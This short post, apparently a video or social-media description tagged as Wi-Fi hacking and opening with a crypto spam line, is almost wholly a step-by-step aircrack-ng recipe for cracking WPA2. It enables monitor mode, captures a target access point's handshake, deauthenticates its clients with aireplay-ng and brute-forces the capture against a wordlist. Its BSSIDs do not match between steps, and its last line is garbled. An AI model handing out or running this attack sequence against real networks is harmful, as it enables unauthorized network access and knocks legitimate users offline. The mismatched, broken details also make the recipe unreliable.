Get Mystery Box with random crypto!

#wifi hacking #aircrackng #wpa2 #airodumpng #aireplayng #monit | Termux

#wifi hacking #aircrackng #wpa2 #airodumpng #aireplayng #monitormode #wlan0mon #externelwifiadapter #dongol
2.4G to 5G
I am Using 2.4G 150mbps

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

airodump-ng -c 1 --bssid 21:43:D6:13:D1:5D -w /root wlan0mon

¶¶ New session2 -do nor close prev1 session
aireplay-ng -0 10 -a 21:43:D6:13:D1:5D wlan0mon

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

¶¶ Get a good wordlist
¶¶ u can simply make a file also for later
hacking-01.cap <--- like /root/Desktop/nana/ wlan0mon